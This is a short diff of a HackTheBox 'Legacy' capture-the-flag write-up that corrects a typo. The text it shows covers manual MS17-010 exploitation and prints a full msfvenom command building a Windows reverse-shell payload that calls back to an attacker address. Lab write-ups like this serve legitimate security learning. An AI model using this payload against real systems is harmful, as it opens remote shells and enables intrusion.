xyberwarfare/HackTheBox/Legacy.md

 ### MS17-010

-Now that I have conpromised the target with Metasploit, let's have a look at some manual exploits.
+Now that I have compromised the target with Metasploit, let's have a look at some manual exploits.
 After doing some research for MS17-010, I found an interesting exploit on Github from [helviojunior](https://github.com/helviojunior/MS17-010).
 I will be using the send_and_execute.py script to send and execute a crafted payload from msfvenom.
 First, let's create the payload with msfvenom.
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.7 LPORT=4444 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe
 <img width="677" alt="image" src="https://user-images.githubusercontent.com/114961392/201569393-0eca9563-3dd3-4bfe-8896-b3f0e9755055.png">